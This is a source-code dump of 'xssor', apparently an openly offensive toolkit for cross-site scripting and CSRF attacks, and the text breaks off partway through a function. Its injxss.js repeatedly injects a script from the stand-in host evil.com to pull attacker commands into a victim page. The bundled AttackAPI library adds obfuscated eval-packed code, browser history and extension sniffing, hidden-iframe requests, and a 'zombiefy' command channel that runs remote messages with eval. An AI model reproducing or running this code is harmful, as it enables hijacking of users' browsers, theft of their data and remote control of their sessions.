├── README.md ├── basic.js ├── create_cmd.php ├── demo └── victim.htm ├── get_xss_codz.php ├── help └── csrf-worm.txt ├── index.html ├── injxss.js ├── injxss.php ├── lib ├── attack.js ├── core.js ├── encode.js ├── inject.js ├── jquery.js ├── worm.js └── xss_codz.txt ├── style └── main.css └── victim ├── rtcmd.txt └── wait.txt /README.md: -------------------------------------------------------------------------------- 1 | xssor 2 | ===== 3 | 4 | XSSOR:方便XSS与CSRF的工具。在线:http://evilcos.me/lab/xssor/ 5 | 6 | NEW 7 | ===== 8 | https://github.com/evilcos/xssor2 9 | -------------------------------------------------------------------------------- /basic.js: -------------------------------------------------------------------------------- 1 | //code by yuxi4n 2 | 3 | $(document).ready(function() { 4 | $("#_0").addClass("active_li").css("color","#333333"); 5 | $(".Ww_B").hide(); 6 | $("#Ww_B_0").show(); 7 | $("#Db_MainNav li a").click(function(){ 8 | $("#Db_MainNav li a").removeClass("active_li").css("color",""); 9 | $(this).addClass("active_li").css("color","#333333"); 10 | var Ww_id = this.id; 11 | $(".Ww_B").hide(); 12 | $("#Ww_B"+Ww_id).show(); 13 | }) 14 | $(".Ww_B_table tr").mouseover(function(){ 15 | $(this).addClass("over");}).mouseout(function(){ 16 | $(this).removeClass("over");}) 17 | // $(".Ww_B_table tr:even").addClass("alt"); 18 | // $(".Ww_B_3_table tr").click(function(){ 19 | // $(".Ww_B_3_table tr").removeClass("cli"); 20 | // $(this).addClass("cli"); 21 | // }) 22 | }); 23 | -------------------------------------------------------------------------------- /create_cmd.php: -------------------------------------------------------------------------------- 1 | $value){ 14 | $content[$key] = stripslashes($value); 15 | } 16 | }else{ 17 | $content = stripslashes($content);} 18 | }else{} 19 | return $content; 20 | } 21 | 22 | ?> -------------------------------------------------------------------------------- /demo/victim.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | victim - demo 6 | 7 | 8 | 9 | 10 | I am Victim. 11 | 12 | 13 | -------------------------------------------------------------------------------- /get_xss_codz.php: -------------------------------------------------------------------------------- 1 | 14 | -------------------------------------------------------------------------------- /help/csrf-worm.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/evilcos/xssor/72a985dfb41d94aa6d147d1dd1829833fd089888/help/csrf-worm.txt -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/evilcos/xssor/72a985dfb41d94aa6d147d1dd1829833fd089888/index.html -------------------------------------------------------------------------------- /injxss.js: -------------------------------------------------------------------------------- 1 | //code by yuxi4n 2 | 3 | function injectScript(src){ 4 | s=document.createElement("script"); 5 | s.src=src; 6 | document.getElementsByTagName("body")[0].appendChild(s); 7 | return s; 8 | } 9 | function removeScript(s){ 10 | document.body.removeChild(s); 11 | } 12 | 13 | setInterval(function(){ 14 | //alert(0) 15 | //injectScript('http://127.0.0.1:8088/knownxss/lib/inject.js'); 16 | var rtcmd = injectScript('http://www.evil.com:8888/web2ghost/injxss.php'); 17 | setTimeout(function(){removeScript(rtcmd);}, 500); 18 | }, 19 | 3000); 20 | -------------------------------------------------------------------------------- /injxss.php: -------------------------------------------------------------------------------- 1 | 41 | -------------------------------------------------------------------------------- /lib/attack.js: -------------------------------------------------------------------------------- 1 | var AttackAPI = { 2 | version: '2.2.0a', 3 | author: 'Petko Petkov | pdp (architect)', 4 | homepage: 'http://www.gnucitizen.org', 5 | projecthome: 'http://www.gnucitizen.org/projects/attackapi'}; 6 | 7 | AttackAPI.core = {}; 8 | 9 | AttackAPI.core.bindFunction = function (func) { 10 | var args = []; 11 | 12 | for (var i = 1; i < arguments.length; i++) 13 | args.push(arguments[i]); 14 | 15 | return function () { 16 | func.apply(null, args); 17 | }; 18 | }; 19 | 20 | AttackAPI.core.extend = function (obj, properties) { 21 | for (var item in properties) 22 | obj[item] = properties[item]; 23 | 24 | return obj; 25 | }; 26 | 27 | AttackAPI.core.clone = function (obj) { 28 | if (arguments.length == 1) { 29 | var _obj = arguments.callee; 30 | _obj.prototype = obj; 31 | 32 | return new _obj(); 33 | } 34 | }; 35 | 36 | AttackAPI.utils = {}; 37 | 38 | AttackAPI.utils.buildQuery = function (obj) { 39 | var tokens = []; 40 | 41 | for (var item in obj) 42 | tokens.push(AttackAPI.utils.encodeURL(item) + '=' + ((obj[item] != undefined && obj[item] != null)?AttackAPI.utils.encodeURL(obj[item]):'')); 43 | 44 | return tokens.join('&'); 45 | }; 46 | 47 | // needs more work on this function 48 | AttackAPI.utils.parseJSON = function (input, isSafe) { 49 | var isSafe = (isSafe != undefined)?isSafe:false; 50 | 51 | if (isSafe && !/^("(\\.|[^"\\\n\r])*?"|[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t])+?$/.test(input)) 52 | return null; 53 | 54 | return eval('(' + input + ')'); 55 | }; 56 | AttackAPI.utils.decodeURL = function (url) { 57 | return unescape(url); 58 | }; 59 | 60 | AttackAPI.utils.packJS = function (script, encoding, fastdecode, specialchars) { 61 | eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[(function(e){return d[e]})];e=(function(){return'\\w+'});c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 V(){5 $21=0,$26=1,$25=2;5 $27=/\\(/g,$1S=/\\$\\d/,$1T=/^\\$\\d+$/,$1Z=/([\'"])\\1\\+(.*)\\+\\1\\1$/,$$2i=/\\\\./g,$1U=/\'/,$$20=/\\13[^\\13]*\\13/g;5 2b=N;N.q=6($1s,$l){c(!$l)$l="";5 $h=(1v(M($1s)).u($27)||"").h+1;c($1S.1q($l)){c($1T.1q($l)){$l=1k($l.T(1))-1}19{5 i=$h;5 $15=$1U.1q(1v($l))?\'"\':"\'";S(i)$l=$l.2j("$"+i--).1r($15+"+a[o+"+i+"]+"+$15);$l=J 2x("a,o","7"+$15+$l.f($1Z,"$1")+$15)}}22($1s||"/^$/",$l,$h)};N.X=6($C){12.h=0;7 2g(1d($C,N.y).f(J W(P,N.2k?"2y":"g"),1y),N.y).f($$20,"")};N.2z=6(){P.h=0};5 12=[];5 P=[];5 1z=6(){7"("+M(N[$21]).T(1,-1)+")"};P.U=6(){7 N.1r("|")};6 22(){F.U=1z;P[P.h]=F}6 1y(){c(!F[0])7"";5 i=1,j=0,$1c;S($1c=P[j++]){c(F[i]){5 $l=$1c[$26];2A(2B $l){1K"6":7 $l(F,i);1K"2C":7 F[$l+i]}5 $28=(F[i].1P(2b.y)==-1)?"":"\\13"+F[i]+"\\13";7 $28+$l}19 i+=$1c[$25]}};6 1d($C,$y){7 $y?$C.f(J W("\\\\"+$y+"(.)","g"),6($u,$2f){12[12.h]=$2f;7 $y}):$C};6 2g($C,$y){5 i=0;7 $y?$C.f(J W("\\\\"+$y,"g"),6(){7 $y+(12[i++]||"")}):$C};6 1v($C){7 $C.f($$2i,"")}};V.2D={2E:V,2k:2d,y:""};6 2c(1h,k,14,1t){5 $Y="$1";1h+="\\n";k=1p.1M(1k(k),2F);6 1F($9){5 i,$1x;1O(i=0;($1x=1e[i]);i++){$9=$1x($9)}7 $9};5 1B=6($O,$B,$e,$m,$t,$G){S($e--)c($m[$e])$O=$O.f(J W(\'\\\\b\'+$t($e)+\'\\\\b\',\'g\'),$m[$e]);7 $O};5 1Y=6(){c(!\'\'.f(/^/,M)){S($e--)$G[$t($e)]=$m[$e]||$t($e);$m=[6($D){7 $G[$D]}];$t=6(){7\'\\\\w+\'};$e=1}};5 1e=[];6 1a($8){1e[1e.h]=$8};6 1Q($9){5 $8=J V;$8.y="\\\\";$8.q(/\'[^\'\\n\\r]*\'/,$Y);$8.q(/"[^"\\n\\r]*"/,$Y);$8.q(/\\/\\/[^\\n\\r]*[\\n\\r]/," ");$8.q(/\\/\\*[^*]*\\*+([^\\/][^*]*\\*+)*\\//," ");$8.q(/\\s+(\\/[^\\/\\n\\r\\*][^\\/\\n\\r]*\\/g?i?)/,"$2");$8.q(/[^\\w\\17\\/\'"*)\\?:]\\/[^\\/\\n\\r\\*][^\\/\\n\\r]*\\/g?i?/,$Y);c(1t)$8.q(/;;;[^\\n\\r]+[\\n\\r]/);$8.q(/\\(;;\\)/,$Y);$8.q(/;+\\s*([};])/,"$2");$9=$8.X($9);$8.q(/(\\b|\\17)\\s+(\\b|\\17)/,"$2 $3");$8.q(/([+\\-])\\s+([+\\-])/,"$2 $3");$8.q(/\\s+/,"");7 $8.X($9)};6 24($9){5 $8=J V;$8.q(/((\\17+)([a-2m-Z$1V]+))(\\d*)/,6($u,$L){5 $h=$u[$L+2].h;5 $1A=$h-1p.2n($h-$u[$L+3].h,0);7 $u[$L+1].2o($1A,$h)+$u[$L+4]});5 $K=/\\2p[A-2q-z\\d]\\w*/;5 $m=1j($9,1f($K),1R);5 $D=$m.$D;$8.q($K,6($u,$L){7 $D[$u[$L]]});7 $8.X($9)};6 1X($9){c(k>Q)$9=23($9);5 $8=J V;5 $t=1g(k);5 $K=(k>Q)?/\\w\\w+/ :/\\w+/;$m=1j($9,1f($K),$t);5 $D=$m.$D;$8.q($K,6($u,$L){7 $D[$u[$L]]});7 $9&&1L($8.X($9),$m)};6 1j($9,$K,$t){5 $1b=$9.u($K);5 $$H=[];5 $$D={};5 $$I={};c($1b){5 $R=[];5 $I={};5 $1n={};5 $e={};5 i=$1b.h,j=0,$E;1l{$E="$"+$1b[--i];c(!$e[$E]){$e[$E]=0;$R[j]=$E;$I["$"+($1n[j]=$t(j))]=j++}$e[$E]++}S(i);i=$R.h;1l{$E=$R[--i];c($I[$E]!=1I){$$H[$I[$E]]=$E.T(1);$$I[$I[$E]]=2h;$e[$E]=0}}S(i);$R.2r(6($1G,$1W){7 $e[$1W]-$e[$1G]});j=0;1l{c($$H[i]==1I)$$H[i]=$R[j++].T(1);$$D[$$H[i]]=$1n[i]}S(++i<$R.h)}7{$H:$$H,$D:$$D,$I:$$I}};6 1L($O,$m){5 $1w=1i("$t\\\\($e\\\\)","g");$O="\'"+1d($O)+"\'";5 $B=1p.1M($m.$H.h,k)||1;5 $e=$m.$H.h;1O(5 i 2v $m.$I)$m.$H[i]="";$m="\'"+$m.$H.1r("|")+"\'.2j(\'|\')";5 $t=k>Q?1m:1g($B);$t=M($t).f(/k/g,"$B").f(/F\\.1o/g,"$t");5 $1u="$e"+($B>10?".U($B)":"");c(14){5 $G=1J(1Y);c(k>Q)$G=$G.f(/\\\\\\\\w/g,"[\\\\2a-\\\\2e]");19 c($B<11)$G=$G.f($1w,$1u);c(!$e)$G=$G.f(1i("($e)\\\\s*=\\\\s*1"),"$1=0")}5 $v=M(1B);c(14){$v=$v.f(/\\{/,"{"+$G+";")}$v=$v.f(/"/g,"\'");c(k>Q){$v=$v.f(/\'\\\\\\\\b\'\\s*\\+|\\+\\s*\'\\\\\\\\b\'/g,"")}c($B>11||k>Q||14){$v=$v.f(/\\{/,"{$t="+$t+";")}19{$v=$v.f($1w,$1u)}$v=2c($v,0,2d,2h);5 $18=[$O,$B,$e,$m];c(14){$18=$18.2G(0,"{}")}7"2l("+$v+"("+$18+"))\\n"};6 1g($B){7 $B>10?$B>11?$B>Q?1m:1E:1D:1C};5 1C=6($p){7 $p};5 1D=6($p){7 $p.U(11)};5 1E=6($p){7($p2s?M.1N($p+29):$p.U(11))};5 1m=6($p){7($p> 4); 136 | chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); 137 | chr3 = ((enc3 & 3) << 6) | enc4; 138 | 139 | result += String.fromCharCode(chr1); 140 | 141 | if (enc3 != 64) 142 | result += String.fromCharCode(chr2); 143 | 144 | if (enc4 != 64) 145 | result += String.fromCharCode(chr3); 146 | } while (i < input.length); 147 | 148 | return result; 149 | }; 150 | 151 | // needs more work on this function 152 | AttackAPI.utils.buildJSON = function (input) { 153 | var m = { 154 | '\b': '\\b', 155 | '\t': '\\t', 156 | '\n': '\\n', 157 | '\f': '\\f', 158 | '\r': '\\r', 159 | '"' : '\\"', 160 | '\\': '\\\\'}; 161 | 162 | var s = { 163 | 'array': function (x) { 164 | var a = ['['], b, f, i, l = x.length, v; 165 | 166 | for (i = 0; i < l; i += 1) { 167 | v = x[i]; 168 | f = s[typeof v]; 169 | 170 | if (f) { 171 | v = f(v); 172 | 173 | if (typeof v == 'string') { 174 | if (b) { 175 | a[a.length] = ','; 176 | } 177 | 178 | a[a.length] = v; 179 | b = true; 180 | } 181 | } 182 | } 183 | 184 | a[a.length] = ']'; 185 | return a.join(''); 186 | }, 187 | 'boolean': function (x) { 188 | return String(x); 189 | }, 190 | 'null': function (x) { 191 | return "null"; 192 | }, 193 | 'number': function (x) { 194 | return isFinite(x) ? String(x) : 'null'; 195 | }, 196 | 'object': function (x) { 197 | if (x) { 198 | if (x instanceof Array) { 199 | return s.array(x); 200 | } 201 | 202 | var a = ['{'], b, f, i, v; 203 | 204 | for (i in x) { 205 | v = x[i]; 206 | f = s[typeof v]; 207 | 208 | if (f) { 209 | v = f(v); 210 | 211 | if (typeof v == 'string') { 212 | if (b) { 213 | a[a.length] = ','; 214 | } 215 | 216 | a.push(s.string(i), ':', v); 217 | b = true; 218 | } 219 | } 220 | } 221 | 222 | a[a.length] = '}'; 223 | return a.join(''); 224 | } 225 | 226 | return 'null'; 227 | }, 228 | 'string': function (x) { 229 | if (/["\\\x00-\x1f]/.test(x)) { 230 | x = x.replace(/([\x00-\x1f\\"])/g, function(a, b) { 231 | var c = m[b]; 232 | 233 | if (c) { 234 | return c; 235 | } 236 | 237 | c = b.charCodeAt(); 238 | return '\\u00' + Math.floor(c / 16).toString(16) + (c % 16).toString(16); 239 | }); 240 | } 241 | 242 | return '"' + x + '"'; 243 | } 244 | }; 245 | 246 | var f = isNaN(input) ? s[typeof input] : s['number']; 247 | 248 | if (f) 249 | return f(input); 250 | }; 251 | AttackAPI.utils.parseURL = function (url) { 252 | var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)?@)?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/; 253 | 254 | var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10}; 255 | var result = new Object(); 256 | var r = REGEX.exec(url); 257 | 258 | for (var field in fields) 259 | result[field] = r[fields[field]]; 260 | 261 | result.hash = result.hash?'#' + result.hash:'#'; 262 | result.search = result.search?'?' + result.search:'?'; 263 | result.username = result.username?result.username:''; 264 | result.password = result.password?result.password:''; 265 | 266 | if (result.port == undefined) 267 | switch (result.protocol) { 268 | case 'http': 269 | result.port = 80; 270 | break; 271 | case 'https': 272 | result.port = 443; 273 | break; 274 | case 'ftp': 275 | result.port = 21; 276 | break; 277 | default: 278 | result.port = ''; 279 | break; 280 | } 281 | 282 | return result; 283 | }; 284 | 285 | AttackAPI.utils.parseQuery = function (query) { 286 | var queryobj = new Object(); 287 | var tokens = query.split('&'); 288 | 289 | for (var index = 0; index < tokens.length; index++) { 290 | var pair = tokens[index].split('='); 291 | queryobj[AttackAPI.utils.decodeURL(pair[0])] = AttackAPI.utils.decodeURL(pair[1]); 292 | } 293 | 294 | return queryobj; 295 | }; 296 | 297 | AttackAPI.utils.parseDomain = function (domain) { 298 | var tokens = domain.split('.').reverse(); 299 | return {domain: domain, tld: tokens[0], name: tokens[1], subdomain: tokens.slice(2).reverse().join('.')}; 300 | }; 301 | 302 | AttackAPI.utils.encodeBase64 = function (input) { 303 | var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; 304 | 305 | var result = ''; 306 | var chr1, chr2, chr3; 307 | var enc1, enc2, enc3, enc4; 308 | var i = 0; 309 | 310 | do { 311 | chr1 = input.charCodeAt(i++); 312 | chr2 = input.charCodeAt(i++); 313 | chr3 = input.charCodeAt(i++); 314 | 315 | enc1 = chr1 >> 2; 316 | enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 317 | enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 318 | enc4 = chr3 & 63; 319 | 320 | if (isNaN(chr2)) 321 | enc3 = enc4 = 64; 322 | else if (isNaN(chr3)) 323 | enc4 = 64; 324 | 325 | result += chars.charAt(enc1) + chars.charAt(enc2) + chars.charAt(enc3) + chars.charAt(enc4); 326 | } while (i < input.length); 327 | 328 | return result; 329 | }; 330 | 331 | AttackAPI.utils.encodeMD5 = function (string) { 332 | eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l 1R(s){k N(Q(O(s),s.u*8))}l Q(x,o){x[o>>5]|=1Y<<((o)%v);x[(((o+1V)>>>9)<<4)+14]=o;g a=1J;g b=-1G;g c=-1H;g d=24;B(g i=0;i>16)+(y>>16)+(D>>16);k(F<<16)|(D&z)}l R(A,w){k(A<>>(v-w))}l O(n){g C=M();g J=(1<<8)-1;B(g i=0;i>5]|=(n.1w(i/8)&J)<<(i%v)}k C}l N(r){g E=\'2a\';g n=\'\';B(g i=0;i>2]>>((i%4)*8+4))&I)+E.K((r[i>>2]>>((i%4)*8))&I)}k n}',62,139,'||||||||||||||md5_hh|md5_ff|var|md5_ii||md5_gg|return|function|safe_add|str|len|md5_cmn||binarray|||length|32|cnt|||0xFFFF|num|for|bin|lsw|hex_tab|msw|oldb|olda|0xF|mask|charAt|oldd|Array|binl2hex|str2binl|oldc|core_md5|bit_rol|45705983|1990404162|643717713|1502002290|1069501632|718787259|165796510|1804603682|||||||||1019803690|40341101|51403784|1735328473|1926607734|1444681467|1163531501|568446438|343485551|38016083|373897302|378558|1236535329|1958414417|1120210379|42063|145523070|701558691|1309151649|1839030562|35309556|1530992060|155497632|681279174|charCodeAt|1473231341|722521979|640364487|176418897|421815835|530742520|995338651|1200080426|198630844|271733879|1732584194|1126891415|1732584193|1416354905|57434055|76029189|1700485571|358537222|680876936|1094730640|hex_md5|1272893353|1894986606|1051523|64|2022574463|2054922799|0x80|1873313359|||||271733878|30611744|1560198380|606105819|187363961|1044525330|0123456789abcdef|405537848|660478335|389564586|1770035416'.split('|'),0,{})); 333 | return hex_md5(string); 334 | }; 335 | 336 | AttackAPI.utils.ip2number = function (ip) { 337 | var octets = ip.split('.'); 338 | return (16777216 * octets[0]) + (65536 * octets[1]) + (256 * octets[2]) + Number(octets[3]); 339 | }; 340 | 341 | AttackAPI.utils.number2ip = function (num) { 342 | return Math.floor(num/16777216)%256 + '.' + Math.floor(num/65536)%256 + '.' + Math.floor(num/256)%256 + '.' + Math.floor(num)%256; 343 | }; 344 | 345 | AttackAPI.dom = {}; 346 | 347 | AttackAPI.dom.getInternalHostname = function () { 348 | try { 349 | var sock = new java.net.Socket(); 350 | 351 | sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0)); 352 | sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port)); 353 | 354 | return sock.getLocalAddress().getHostName(); 355 | } catch (e) {} 356 | 357 | return 'localhost'; 358 | }; 359 | 360 | AttackAPI.dom.scanExtensions = function (scan) { 361 | var signatures = (scan.signatures != undefined)?scan.signatures:AttackAPI.dom.signatures.extensions; 362 | 363 | function check(signature, index, length) { 364 | var img = new Image(); 365 | img.onload = function() { 366 | if (typeof(scan.onfound) == 'function') 367 | scan.onfound(signature, scan); 368 | 369 | if (index == length - 1 && typeof(scan.oncomplete) == 'function') 370 | scan.oncomplete(scan); 371 | }; 372 | img.onerror = function() { 373 | if (index == length - 1 && typeof(scan.oncomplete) == 'function') 374 | scan.oncomplete(scan); 375 | }; 376 | img.src = signature.url; 377 | } 378 | 379 | for (var i = 0; i < signatures.length; i++) 380 | check(signatures[i], i, signatures.length); 381 | }; 382 | 383 | AttackAPI.dom.triggerEvent = function (event, data, target) { 384 | var target = (target == undefined)?window:target; 385 | 386 | if (typeof(target['on' + event]) == 'function') 387 | target['on' + event](data); 388 | }; 389 | 390 | AttackAPI.dom.scanHistory = function (scan) { 391 | var urls = (scan.urls != undefined)?scan.urls:AttackAPI.dom.signatures.sites; 392 | 393 | var ifr = document.createElement('iframe'); 394 | ifr.style.visibility = 'hidden'; 395 | ifr.style.width = ifr.style.height = 0; 396 | 397 | document.body.appendChild(ifr); 398 | 399 | var doc = AttackAPI.dom.getDocument(ifr); 400 | doc.open(); 401 | doc.write(''); 402 | doc.close(); 403 | 404 | for (var i = 0; i < urls.length; i++) { 405 | var a = doc.createElement('a'); 406 | a.href = urls[i]; 407 | 408 | doc.body.appendChild(a); 409 | 410 | if (a.currentStyle) 411 | var display = a.currentStyle['display']; 412 | else 413 | var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display') 414 | 415 | if (display == 'none' && typeof(scan.onfound) == 'function') 416 | scan.onfound(urls[i], scan); 417 | } 418 | 419 | document.body.removeChild(ifr); 420 | 421 | if (typeof(scan.oncomplete) == 'function') 422 | scan.oncomplete(scan); 423 | }; 424 | 425 | AttackAPI.dom.attachEvent = function (callback, event, target, capturing) { 426 | var target = (target == undefined)?window:target; 427 | var capturing = (capturing == undefined)?false:true; 428 | 429 | if (target.addEventListener) 430 | target.addEventListener(event, callback, capturing); 431 | else 432 | target.attachEvent('on' + event, callback); 433 | }; 434 | 435 | AttackAPI.dom.spawnSandbox = function (data) { 436 | var queue = []; 437 | var loaded = false; 438 | 439 | var ifr = document.createElement('iframe'); 440 | ifr.style.visibility = 'hidden'; 441 | ifr.style.width = ifr.style.height = 0; 442 | 443 | document.body.appendChild(ifr); 444 | 445 | var sandbox = { 446 | scope: ifr.contentWindow, 447 | 448 | evaluate: function (expr) { 449 | if (!loaded) 450 | queue.push(expr) 451 | 452 | else 453 | ifr.contentWindow.location = 'javascript:' + escape(expr) + ';void(0);'; 454 | }, 455 | terminate: function () { 456 | document.body.removeChild(ifr); 457 | } 458 | }; 459 | 460 | ifr.onload = function () { 461 | loaded = true; 462 | 463 | AttackAPI.core.extend(ifr.contentWindow, data); 464 | 465 | for (var i = 0; i < queue.length; i++) 466 | sandbox.evaluate(queue[i]); 467 | }; 468 | 469 | return sandbox; 470 | }; 471 | 472 | AttackAPI.dom.requestLC = function (request) { 473 | try { 474 | if (typeof(request.onload) == 'function') 475 | request.onload({data: AttackAPI.dom.requestLCL(request.url + (request.query?request.query:'?' + AttackAPI.utils.buildQuery(request.query)))}, request); 476 | } catch (e) { 477 | if (typeof(request.onerror) == 'function') 478 | request.onerror(e, request); 479 | } 480 | }; 481 | 482 | AttackAPI.dom.getDocument = function (target) { 483 | var doc = null; 484 | 485 | if (target == undefined) 486 | doc = document; 487 | else if (target.contentDocument) 488 | doc = target.contentDocument; 489 | else if (target.contentWindow) 490 | doc = target.contentWindow.document; 491 | else if (target.document) 492 | doc = target.document; 493 | 494 | return doc; 495 | }; 496 | 497 | AttackAPI.dom.freeze = function (time) { 498 | var date = new Date(); 499 | var cur = null; 500 | 501 | do { 502 | cur = new Date(); 503 | } while(cur - date < time); 504 | }; 505 | 506 | AttackAPI.dom.spawnChannel = function (channel) { 507 | if (AttackAPI.dom.spawnChannel.channels == undefined) 508 | AttackAPI.dom.spawnChannel.channels = new Array(); 509 | 510 | var channel = AttackAPI.core.clone(channel); 511 | channel.index = AttackAPI.dom.spawnChannel.channels.length; 512 | channel.referrer = channel.referrer?channel.referrer:document.location; 513 | 514 | function transport(query) { 515 | AttackAPI.core.extend(query, { 516 | referrer: channel.referrer, 517 | __r: Math.random() + '_' + new Date().getTime()}); 518 | 519 | AttackAPI.dom.transport({url: channel.location, query: query}); 520 | } 521 | 522 | function evaluate(query) { 523 | AttackAPI.core.extend(query, { 524 | referrer: channel.referrer, 525 | __r: Math.random() + '_' + new Date().getTime()}); 526 | 527 | AttackAPI.dom.requestJSL(channel.location + '?' + AttackAPI.utils.buildQuery(query)); 528 | } 529 | 530 | function prepareList(obj) { 531 | if (obj.join) 532 | return obj.join(','); 533 | 534 | return obj; 535 | } 536 | 537 | if (typeof(channel.onpull) != 'function') 538 | channel.onpull = function (message) { 539 | eval(message); 540 | }; 541 | 542 | channel.pull = function () { 543 | evaluate({ 544 | action: 'pull', 545 | callback: 'AttackAPI.dom.spawnChannel.channels[' + channel.index + '].onpull'}); 546 | 547 | return true; 548 | }; 549 | 550 | channel.push = function (message, client, target) { 551 | if (typeof(channel.onpush) == 'function' && !channel.onpush(message, client, target)) 552 | return false; 553 | 554 | transport({ 555 | action: 'push', 556 | message: message, 557 | target: target?target:'_', 558 | client: prepareList(client?client:'self')}); 559 | 560 | return true; 561 | }; 562 | 563 | channel.list = function () { 564 | if (typeof(channel.onlist) == 'undefined') 565 | return false; 566 | 567 | evaluate({ 568 | action: 'list', 569 | callback: 'AttackAPI.dom.spawnChannel.channels[' + channel.index + '].onlist'}); 570 | 571 | return true; 572 | }; 573 | 574 | channel.enumerate = function () { 575 | if (typeof(channel.onenumerate) == 'undefined') 576 | return false; 577 | 578 | evaluate({ 579 | action: 'enum', 580 | callback: 'AttackAPI.dom.spawnChannel.channels[' + channel.index + '].onenumerate'}); 581 | 582 | return true; 583 | }; 584 | 585 | channel.view = function (client) { 586 | if (typeof(channel.onview) == 'undefined') 587 | return false; 588 | 589 | evaluate({ 590 | action: 'view', 591 | client: prepareList(client?client:'self'), 592 | callback: 'AttackAPI.dom.spawnChannel.channels[' + channel.index + '].onview'}); 593 | 594 | return true; 595 | }; 596 | 597 | channel.save = function (key, value, client) { 598 | if (typeof(channel.onsave) && !channel.onsave(key, value, client)) 599 | return false; 600 | 601 | transport({ 602 | action: 'save', 603 | key: key, 604 | value: value, 605 | client: prepareList(client?client:'self')}); 606 | 607 | return true; 608 | }; 609 | 610 | channel.init = function () { 611 | if (typeof(channel.oninit) && !channel.oninit()) 612 | return false; 613 | 614 | evaluate({ 615 | action: 'init'}); 616 | }; 617 | 618 | AttackAPI.dom.spawnChannel.channels.push(channel); 619 | 620 | return channel; 621 | }; 622 | 623 | AttackAPI.dom.requestLCL = function (url) { 624 | var data = null; 625 | 626 | var destination = new java.net.URL(url); 627 | var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536); 628 | var stream = destination.getContent(); 629 | 630 | while (true) { 631 | var count = stream.read(buffer); 632 | 633 | if (count <= 0) 634 | break; 635 | 636 | var str = new java.lang.String(buffer, 0, count); 637 | data += str; 638 | } 639 | 640 | stream.close(); 641 | 642 | return data; 643 | }; 644 | 645 | AttackAPI.dom.zombiefy = function (zombie) { 646 | AttackAPI.dom.spawnZombie(zombie).start(); 647 | }; 648 | 649 | AttackAPI.dom.requestIMG = function (request) { 650 | var tmr = null; 651 | 652 | var img = new Image(); 653 | img.onload = img.onerror = function () { 654 | window.clearTimeout(tmr); 655 | 656 | if (typeof(request.onload) == 'function') 657 | request.onload(new Object(), request); 658 | }; 659 | 660 | if (request.query) 661 | img.src = request.url + '?' + AttackAPI.utils.buildQuery(request.query); 662 | else 663 | img.src = request.url; 664 | 665 | tmr = window.setTimeout(function () { 666 | delete img; 667 | 668 | if (typeof(request.ontimeout) == 'function') 669 | request.ontimeout(request); 670 | }, request.timeout?request.timeout:1000); 671 | }; 672 | 673 | AttackAPI.dom.requestJS = function (request) { 674 | var tmr = null; 675 | 676 | var script = document.createElement('script'); 677 | script.type = 'text/javascript'; 678 | script.defer = true; 679 | script.onload = function () { 680 | window.clearTimeout(tmr); 681 | document.body.removeChild(script); 682 | 683 | if (typeof(request.onload) == 'function') 684 | request.onload(new Object(), request); 685 | }; 686 | script.onerror = function () { 687 | window.clearTimeout(tmr); 688 | document.body.removeChild(script); 689 | 690 | if (typeof(request.onerror) == 'function') 691 | request.onerror('error', request); 692 | }; 693 | 694 | if (request.query) 695 | script.src = request.url + '?' + AttackAPI.utils.buildQuery(request.query); 696 | else 697 | script.src = request.url; 698 | 699 | document.body.appendChild(script); 700 | 701 | tmr = window.setTimeout(function () { 702 | document.body.removeChild(script); 703 | 704 | if (typeof(request.ontimeout) == 'function') 705 | request.ontimeout(request); 706 | }, request.timeout?request.timeout:1000); 707 | }; 708 | 709 | AttackAPI.dom.requestXSS = function (request) { 710 | var tmr = null; 711 | 712 | var ifr = document.createElement('iframe'); 713 | ifr.style.visibility = 'hidden'; 714 | ifr.style.width = ifr.style.height = 0; 715 | ifr.onload = function () { 716 | window.clearTimeout(tmr); 717 | 718 | var data = null; 719 | try { 720 | data = AttackAPI.getDocument(ifr).body.innerHTML; 721 | } catch (e) {} 722 | 723 | ifr.src = ''; 724 | document.body.removeChild(ifr); 725 | 726 | if (typeof(request.onload) == 'function') 727 | request.onload({data: data}, request); 728 | }; 729 | 730 | if (request.query) 731 | ifr.src = request.url + '?' + AttackAPI.utils.buildQuery(request.query); 732 | else 733 | ifr.src = request.url; 734 | 735 | document.body.appendChild(ifr); 736 | 737 | tmr = window.setTimeout(function () { 738 | ifr.src = ''; 739 | document.body.removeChild(ifr); 740 | 741 | if (typeof(request.ontimeout) == 'function') 742 | request.ontimeout(request); 743 | }, request.timeout?request.timeout:1000); 744 | }; 745 | 746 | AttackAPI.dom.spider = function (spider) { 747 | AttackAPI.dom.requestXML({url: spider.url, timeout: spider.timeout, 748 | onload: function (response, request) { 749 | // analise and return all possible links 750 | } 751 | }); 752 | }; 753 | AttackAPI.dom.request = function (request) { 754 | var turl = AttackAPI.utils.parseURL(request.url); 755 | var curl = AttackAPI.utils.parseURL(document.location); 756 | 757 | if (turl.protocol == curl.protocol && turl.hostname == curl.hostname && turl.port == curl.port) 